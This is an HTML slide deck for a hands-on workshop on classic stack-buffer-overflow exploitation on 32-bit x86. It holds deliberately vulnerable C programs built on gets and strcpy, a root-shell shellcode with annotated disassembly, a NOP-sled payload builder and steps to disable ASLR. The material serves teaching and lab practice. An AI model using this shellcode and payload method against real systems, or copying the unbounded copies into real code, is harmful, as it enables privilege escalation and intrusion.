smash-talk/index.html

2020-01-16 08:42:45 +01:00
<!DOCTYPE html>
<html>
<head>
<title>Old skool stack smashing</title>
<meta charset="utf-8">
<style>
@import url(https://fonts.googleapis.com/css?family=Droid+Serif);
@import url(https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz);
@import url(https://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700,400italic);
body {
font-family: 'Droid Serif';
}
h1, h2, h3 {
font-family: 'Yanone Kaffeesatz';
font-weight: 400;
margin-bottom: 0;
}
.remark-slide-content h1 { font-size: 3em; }
.remark-slide-content h2 { font-size: 2em; }
.remark-slide-content h3 { font-size: 1.6em; }
.footnote {
position: absolute;
bottom: 3em;
font-size: 0.7em;
}
li p { line-height: 1.25em; }
.red { color: #fa0000; }
.large { font-size: 2em; }
a, a > code {
color: rgb(249, 38, 114);
text-decoration: none;
}
code {
background: #e7e8e2;
border-radius: 5px;
}
.remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
.remark-code-line-highlighted { background-color: #373832; }
.pull-left {
float: left;
width: 47%;
}
.pull-right {
float: right;
width: 47%;
}
.pull-right ~ p {
clear: both;
}
#slideshow .slide .content code {
font-size: 0.8em;
}
#slideshow .slide .content pre code {
font-size: 0.9em;
padding: 15px;
}
.inverse {
background: #272822;
color: #777872;
text-shadow: 0 0 20px #333;
}
.inverse h1, .inverse h2 {
color: #f3f3f3;
line-height: 0.8em;
}
/* Slide-specific styling */
#slide-inverse .footnote {
bottom: 12px;
left: 20px;
}
#slide-how .slides {
font-size: 0.9em;
position: absolute;
top: 151px;
right: 140px;
}
#slide-how .slides h3 {
margin-top: 0.2em;
}
#slide-how .slides .first, #slide-how .slides .second {
padding: 1px 20px;
height: 90px;
width: 120px;
-moz-box-shadow: 0 0 10px #777;
-webkit-box-shadow: 0 0 10px #777;
box-shadow: 0 0 10px #777;
}
#slide-how .slides .first {
background: #fff;
position: absolute;
top: 20%;
left: 20%;
z-index: 1;
}
#slide-how .slides .second {
position: relative;
background: #fff;
z-index: 0;
}
/* Two-column layout */
.left-column {
color: #777;
width: 20%;
height: 92%;
float: left;
}
.left-column h2:last-of-type, .left-column h3:last-child {
color: #000;
}
.right-column {
width: 75%;
float: right;
padding-top: 1em;
}
</style>
</head>
<body>
<textarea id="source">
name: inverse
layout: true
class: center, middle, inverse
---
# Old skool stack smashing
Ward Wouts<br>
https://wizeazz.nl/smash/
---
# Agenda
1. Introduction
1. What is a stack?
1. How does this work?
1. Vulnerable functions
1. Now what can we do with this?
1. Shellcode?
1. Endianness?
1. Demo
1. DIY
1. Quick Radare2 reference
---
# Introduction
---
layout: false
.left-column[
## Introduction
]
.right-column[
C is full of holes, let's get to know one.

Old skool, so no OS or hardware protections, which today is mostly relevant in IoT. (Remember, the `S` in `IoT` stands for Security.)

Stack smashing exploits a buffer overflow vulnerability in code that keeps variables on the stack. This type of vulnerability has been known for a long time. The attack was first properly documented in Phrack #49 ("Smashing The Stack For Fun And Profit").

.footnote[[Phrack #49](http://www.phrack.org/issues/49/14.html#article)]
]
---
template: inverse
# What is a stack?
---
.left-column[
## What is a stack?
]
.right-column[
Stacks in computing architectures are regions of memory where data is added or removed in a last-in-first-out (LIFO) manner.
The stack is used to pass arguments between functions, to allocate space for local variables, and to remember how to get back out of the current function.
On x86 systems the stack grows downward: it starts at a high memory address and grows toward lower addresses.
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack-based_memory_allocation)]
]
---
.left-column[
## Say wut?
]
.right-column[
Whenever a function is called, a frame is added to the stack. Whenever the function returns, its frame is removed again.
Such a frame consists of the function's local variables, a saved frame pointer and a return address.
]
---
.left-column[
## This is not helping, you know...
]
.right-column.center.middle[
<img src="Stack.png" width="100%" />
]
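---
.left-column[
## What is a stack?
]
.right-column[
The growth direction can be observed from C itself. The sketch below is a minimal probe, not part of the original talk: `stack_direction` and `compare_frames` are hypothetical names, and `__attribute__((noinline))` assumes GCC or Clang. It compares the address of a local variable in a caller with one in its callee.

```c
#include <stdint.h>

/* Returns 1 if the callee's local sits at a lower address than the
   caller's local (the stack grew down), -1 otherwise. */
__attribute__((noinline))
static int compare_frames(volatile char *caller_local)
{
    volatile char callee_local = 0;
    return ((uintptr_t)&callee_local < (uintptr_t)caller_local) ? 1 : -1;
}

/* Hypothetical helper: probes in which direction new frames are added. */
int stack_direction(void)
{
    volatile char caller_local = 0;
    return compare_frames(&caller_local);
}
```

On x86 Linux this should normally report 1, but a compiler is free to lay out frames differently, so treat the result as an observation rather than a guarantee.
]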
---
template: inverse
# How does this work?
---
.left-column[
## How does this work?
]
.right-column[
## Start with some code:
``` C
#include <string.h>

void foo (char *bar)
{
    char c[12];

    strcpy(c, bar);  // no bounds checking
}

int main (int argc, char **argv)
{
    foo(argv[1]);
    return 0;
}
```
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_2.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_3.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_4.png" width="85%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
template: inverse
# Vulnerable functions
---
.left-column[
## Vulnerable functions
]
.right-column[
Any function that writes into a buffer without taking the buffer's size into account. The big ones are:
- gets
- strcpy
- sprintf
]
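---
.left-column[
## Vulnerable functions
]
.right-column[
For contrast, here is a minimal sketch of size-aware counterparts built on `snprintf` and `fgets`. The wrapper names `copy_bounded` and `read_line` are made up for this example. They are one possible way to do it, not the only one.

```c
#include <stdio.h>
#include <string.h>

/* Copy src into dst without ever writing more than dstsize bytes.
   Returns 0 if the whole string fit, -1 if it was truncated. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    /* snprintf NUL-terminates and reports the length it would have needed. */
    int needed = snprintf(dst, dstsize, "%s", src);
    return (needed >= 0 && (size_t)needed < dstsize) ? 0 : -1;
}

/* Bounded stand-in for gets(): reads at most dstsize - 1 characters and
   strips the trailing newline. Returns 0 on success, -1 on EOF or error. */
int read_line(char *dst, size_t dstsize, FILE *in)
{
    if (dstsize == 0 || fgets(dst, (int)dstsize, in) == NULL)
        return -1;
    dst[strcspn(dst, "\n")] = '\0';
    return 0;
}
```

With `char c[12]`, calling `copy_bounded(c, sizeof c, bar)` truncates an overlong `bar` instead of running over the return address.
]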
---
template: inverse
# Now what can we do with this?
---
.left-column[
## Now what can we do with this?
]
.right-column[
We can change the flow through the program:
- Jump to a different function in a known spot in memory
- Jump to our own shellcode somewhere in the buffer (the shellcode may also be placed past the return address)
- Jump to our own shellcode in the environment

*Full nerd: By overwriting the return address we control which instructions the Instruction Pointer (`EIP` in 32-bit x86, `RIP` in 64-bit x86) points to next. `EIP` and `RIP` are so-called registers. There are more, like `EBP`/`RBP`, which holds the frame pointer (the base of the current stack frame), and `ESP`/`RSP`, which points at the top of the stack. Most of the other registers are used like variables.*
.footnote[Lots of shellcode [here](http://shell-storm.org/shellcode/)]
]
---
template: inverse
# Shellcode?
---
.left-column[
## Shellcode?
]
.right-column[
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. [1]
Here's a bit of shellcode to open `/bin/sh` on 32-bit x86 (37 bytes) [2]:
```
\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2
\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x52\x53\x89\xe1\xcd\x80
```
As strings in C are NUL-terminated, shellcode should not have `\x00` in it.

`\x90` is a NOP (No Operation) in x86. You can put a bunch of those in front of your shellcode to increase the chances of ending up in it: a jump that lands anywhere in the NOPs slides on into the shellcode. This is called a NOP-sled.

Sometimes swapping out one shellcode for another does the trick.

.footnote[[1] Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Shellcode)<br>[2] Shellcode from [shell-storm](http://shell-storm.org/shellcode/files/shellcode-251.php)]
]
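---
.left-column[
## Shellcode?
]
.right-column[
Which bytes are "bad" depends on the vulnerable function: `strcpy` stops copying at `\x00`, while `gets` stops reading at a newline (`\x0a`). A small checker makes this easy to verify before use. This is a sketch. `find_bad_byte` is a hypothetical helper, and the byte array is the 37-byte shellcode shown earlier.

```c
#include <stddef.h>

/* The 37-byte shellcode from the previous slide. */
static const unsigned char shellcode[] =
    "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2"
    "\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x52\x53\x89\xe1\xcd\x80";

/* Length without the terminator the C string literal appends. */
static const size_t shellcode_len = sizeof shellcode - 1;

/* Returns the index of the first byte equal to `bad`, or -1 if none. */
long find_bad_byte(const unsigned char *code, size_t len, unsigned char bad)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == bad)
            return (long)i;
    return -1;
}
```

Calling `find_bad_byte(shellcode, shellcode_len, 0x00)` and the same with `0x0a` tells you whether this shellcode survives `strcpy` or `gets` respectively.
]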
---
template: inverse
# Endianness?
---
.left-column[
## Endianness?
]
.right-column[
In computing, endianness refers to the order of bytes (or sometimes bits) within a binary representation of a number. It can also be used more generally to refer to the internal ordering of any representation, such as the digits in a numeral system or the sections of a date.
In its most common usage, endianness indicates the ordering of bytes within a multi-byte number. A **big-endian** ordering places the most significant byte first and the least significant byte last, while a **little-endian** ordering does the opposite. For example, consider the unsigned hexadecimal number 0x1234, which requires at least two bytes to represent. In a big-endian ordering they would be `[ 0x12, 0x34 ]`, while in a little-endian ordering, the bytes would be arranged `[ 0x34, 0x12 ]`.
x86 is a **little-endian** architecture, so addresses are stored in memory least significant byte first.
]
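---
.left-column[
## Endianness?
]
.right-column[
When an address has to be written into an input byte by byte, the ordering has to be done by hand. A minimal sketch, with `pack_le32` as a hypothetical helper name:

```c
#include <stdint.h>

/* Write a 32-bit value into out[0..3], least significant byte first,
   which is the order in which x86 stores it in memory. */
void pack_le32(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

For the value `0xdeadbeef` this yields the bytes `ef be ad de`. Shifting and masking, rather than copying the integer's memory, gives the same result on any host.
]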
---
template: inverse
# Exploitation workflow
---
.left-column[
## Exploitation workflow
]
.right-column[
- Find an input that overflows a buffer
- Figure out the exact length needed for the overflow to reach the return address
- Place shellcode in memory, ideally with a NOP-sled in front
- Figure out the shellcode's location
- Use the overflow to point the return address at the shellcode/NOP-sled
  - Do take endianness into account
]
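---
.left-column[
## Exploitation workflow
]
.right-column[
Put together, the input has a fixed layout. The sketch below builds one for 32-bit x86. `build_payload` and all its parameters are hypothetical. The offset and the return address are values you have to find in a debugger, and splitting the spare room in half for the sled is an arbitrary choice.

```c
#include <stdint.h>
#include <string.h>

/* Lay out NOP-sled, shellcode, padding and return address in buf.
   offset = bytes from the start of the input to the saved return address
   ret    = address to jump to, somewhere inside the NOP-sled
   Returns the payload length, or 0 if it does not fit. */
size_t build_payload(unsigned char *buf, size_t bufsize, size_t offset,
                     const unsigned char *code, size_t codelen, uint32_t ret)
{
    if (codelen > offset || offset + 4 > bufsize)
        return 0;
    size_t sled = (offset - codelen) / 2;        /* half of the spare room */
    memset(buf, 0x90, sled);                     /* NOP-sled */
    memcpy(buf + sled, code, codelen);           /* shellcode */
    memset(buf + sled + codelen, 'A', offset - sled - codelen); /* padding */
    for (int i = 0; i < 4; i++)                  /* little-endian address */
        buf[offset + i] = (unsigned char)(ret >> (8 * i));
    return offset + 4;
}
```

The padding also covers the saved frame pointer, which sits just below the return address.
]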
---
template: inverse
# Demo
---
.left-column[
## Demo
]
.right-column[
This is the code for the binary:
``` C
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
    char buf[128];

    if(argc == 1){
        printf("Usage: %s argument\n", argv[0]);
        exit(1);
    }
    strcpy(buf,argv[1]);
    printf("%s", buf);

    return 0;
}
```
Binary here: https://wizeazz.nl/smash/code/demo
.footnote[Borrowed from [Overthewire.org](https://overthewire.org/wargames/narnia/)]
]
---
template: inverse
# Protections
---
.left-column[
## Protections
]
.right-column[
- Stack canaries<br>
Place a known value between the local variables and the return address, and check that it hasn't changed before returning from the function.
- Nonexecutable stack<br>
W^X (write xor execute): memory is either writable or executable, never both, so code on the stack won't be executed (but overwritten return addresses are still followed).
- Randomization (ASLR)<br>
Shuffle function and stack addresses so that the locations are different every time a program is executed.

All of these can be worked around given the right conditions. They just make things annoying, euh, harder.
]
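---
.left-column[
## Protections
]
.right-column[
The canary idea can be mimicked in plain C with a simulated frame. This is only an illustration under stated assumptions: the layout in `struct frame`, the `CANARY` value and `copy_and_check` are all made up here. A real compiler inserts the check itself and uses a random value per process.

```c
#include <stdint.h>
#include <string.h>

#define CANARY 0x00c0ffeeu   /* hypothetical fixed value, for the demo only */

/* Simulated frame: 12-byte buffer, then the canary, then the return address. */
struct frame {
    unsigned char bytes[12 + 4 + 4];
};

/* Copy n input bytes the way an unchecked copy would (clamped to the
   simulated frame so the sketch itself stays in bounds), then compare the
   canary like a function epilogue does.
   Returns 0 if the canary is intact, -1 if smashing was detected. */
int copy_and_check(struct frame *f, const unsigned char *input, size_t n)
{
    uint32_t canary = CANARY, found;
    memcpy(f->bytes + 12, &canary, 4);     /* prologue: place the canary */
    if (n > sizeof f->bytes)
        n = sizeof f->bytes;
    memcpy(f->bytes, input, n);            /* the overflowing write */
    memcpy(&found, f->bytes + 12, 4);      /* epilogue: check the canary */
    return found == canary ? 0 : -1;
}
```

Any write that reaches the return address has to cross the canary first, which is why 13 bytes of input are already enough to trip the check.
]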
---
template: inverse
# DIY
---
.left-column[
## DIY
]
.right-column[
Now it's your turn.
Log into the provided VM. Binary and shellcode are in `/smash`.

**Alternative:** If you want to use your own system, do this as preparation:
- Install radare2: `$ sudo apt-get install -y radare2`<br>**OR**<br> `$ git clone https://github.com/radareorg/radare2.git && cd radare2 && sys/user.sh`<br>for a persistent installation.
- Turn off ASLR: `$ sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"`
- Check: `$ sysctl -a --pattern randomize`
- Enable debugging: `$ sudo sh -c "echo 0 > /proc/sys/kernel/yama/ptrace_scope"`
- Download binary:<br> `$ curl -O https://wizeazz.nl/smash/code/diy`
- Make executable: `$ chmod a+x diy`
.footnote[Linux and ASLR settings [here](https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/)]
]
---
.left-column[
## DIY
]
.right-column[
Assignment:
- Make the binary print `You win`.
This is the code for the binary:
``` C
#include <stdio.h>
#include <strings.h>

void winner()
{
    printf("You win\n");
}

void whoareyou()
{
    char name[250];

    printf("What's your name? ");
    gets(name);
    printf("\nHello, %s\n", name);
}

int main()
{
    whoareyou();
    printf("You lose\n");
}
```
]
---
.left-column[
## DIY
]
.right-column[
Now, if you managed that:
- Try to make it open a shell via shellcode. Especially fun if you make the binary SUID root:<br> `$ sudo chown root:root diy && sudo chmod u+s diy`
- Can be done both via shellcode in an environment variable (usually more reliable **HINT**) and via shellcode in the buffer

Tip: when the input is piped in, stdin hits end-of-file as soon as your input has been read, so the freshly started shell exits immediately. The trick is to keep stdin open with something like:<br>
`$ (echo -e MYINPUT; cat)|./diy`<br>
This won't give you a prompt!
]
---
template: inverse
# Quick Radare2 reference
---
.left-column[
## Quick Radare2 reference
]
.right-column[
- `r2 -Ad <program>` start radare2 in debugger mode and analyse program
- `afl` list functions
- `pdf@<function>` disassemble function (e.g. `pdf@main`)
- `pxw @<location>` print memory (e.g. `pxw @ebp`)
- `db <address>` Set breakpoint
- `dc` continue to breakpoint
- `ds` step into
- `V` go to visual mode
- `q` leave visual mode
- `p` next view (2x for debugger view)
- `s` step into
- `S` step over
- `?v HEX` built-in calculator (e.g. `?v 0xdead0000+0xbeef`)
- `?vi HEX` hex to integer (e.g. `?vi 0x400`)
]
---
template: inverse
# Quick GDB reference
---
.left-column[
## Quick GDB reference
]
.right-column[
- `gdb --args <program> <arguments>` start gdb with a program with arguments
- `disas <function>` disassemble a function
- `b *<address>` set a breakpoint on an address
- `x/200x $esp` show 200 words of memory in hex (4 bytes each by default), starting at the address `$esp` points to
- `x/200c <addr>` show 200 bytes of memory as characters, starting at the address
- `r` run
- `r < foo.txt` run with stdin filled from a file
- `c` continue
- `s` step into
- `info functions` list all functions
- `p (char*)getenv("PATH")` find the memory location of an environment variable for the running program (use a breakpoint!)
Many improvements exist to make gdb nicer for reverse engineering, such as:
- https://github.com/pwndbg/pwndbg
- https://github.com/hugsy/gef
- https://github.com/longld/peda
]
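---
.left-column[
## Quick GDB reference
]
.right-column[
The `getenv` trick also works outside the debugger. A minimal sketch, with `env_addr` as a hypothetical helper name, that prints where the value of an environment variable lives in the current process:

```c
#include <stdio.h>
#include <stdlib.h>

/* Print where an environment variable's value lives in this process.
   Returns the address, or NULL if the variable is not set. */
const char *env_addr(const char *name)
{
    const char *value = getenv(name);
    if (value != NULL)
        printf("%s is at %p\n", name, (const void *)value);
    return value;
}
```

Keep in mind that the address is only valid for the process that printed it. In another binary it may shift, for instance with the length of the program name, and with ASLR enabled it changes on every run.
]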
---
template: inverse
# Shellcode explained
---
.left-column[
## Shellcode explained
]
.right-column[
Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
```
/*
* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 37 bytes - xgc@gotfault.net
*/
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80" // int $0x80
```
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
```
`int 0x80` is the legacy way of making a syscall to the kernel on 32-bit x86 Linux. See also: http://www.linfo.org/int_0x80.html

As this is a 32-bit program, the list of syscalls can be found in `/usr/include/asm/unistd_32.h`, which shows the numbers in decimal: 0x17 = 23 = setuid.

So, what's done here is: put 0x17 in EAX, and make EBX (the argument for setuid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 by XORing it with itself. Then trigger `int 0x80`, resulting in a `setuid(0)`. The `push`/`pop` and `xor` detours are used because loading these values with a plain `mov` would put `\x00` bytes in the shellcode.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
```
Pretty much the same as the last snippet, but for 0x2e = 46 = setgid. EBX is still 0 from before, so this results in a `setgid(0)`.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80" // int $0x80
```
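Another `int 0x80` here, this time for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little-endian, so read `//sh`. Same for 0x6e69622f, which gives `/bin`. Together this makes `/bin//sh`. The double `/` pads the string to exactly two 32-bit words, so no `\x00` filler is needed. The terminating zero comes from the `push %edx` just before.

The arguments for execve will not fit in registers, as they're variable size, so the registers hold pointers instead: EBX points to the string, ECX points to the argument array (the pointer to the string followed by a NULL) and EDX, still 0, is the NULL environment pointer.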
]
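---
.left-column[
## Shellcode explained
]
.right-column[
The byte shuffling is easy to check in C. The sketch below rebuilds the string that the two `push` instructions leave on the stack. `pushed_string` is a hypothetical helper, not part of the shellcode.

```c
#include <stdint.h>

/* Rebuild the string the two pushes leave on the stack.
   The stack grows down, so the word pushed last ends up at the lower
   address. Each word is stored least significant byte first. */
void pushed_string(uint32_t pushed_first, uint32_t pushed_last, char out[9])
{
    const uint32_t words[2] = { pushed_last, pushed_first };
    for (int w = 0; w < 2; w++)
        for (int b = 0; b < 4; b++)
            out[4 * w + b] = (char)((words[w] >> (8 * b)) & 0xff);
    out[8] = '\0';   /* in the shellcode: the earlier push of EDX, which is 0 */
}
```

Calling `pushed_string(0x68732f2f, 0x6e69622f, buf)` fills `buf` with `/bin//sh`, which is the string EBX points at when `int 0x80` fires.
]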
</textarea>
<script src="https://remarkjs.com/downloads/remark-latest.min.js">
</script>
<script>
var slideshow = remark.create();
</script>
</body>
</html>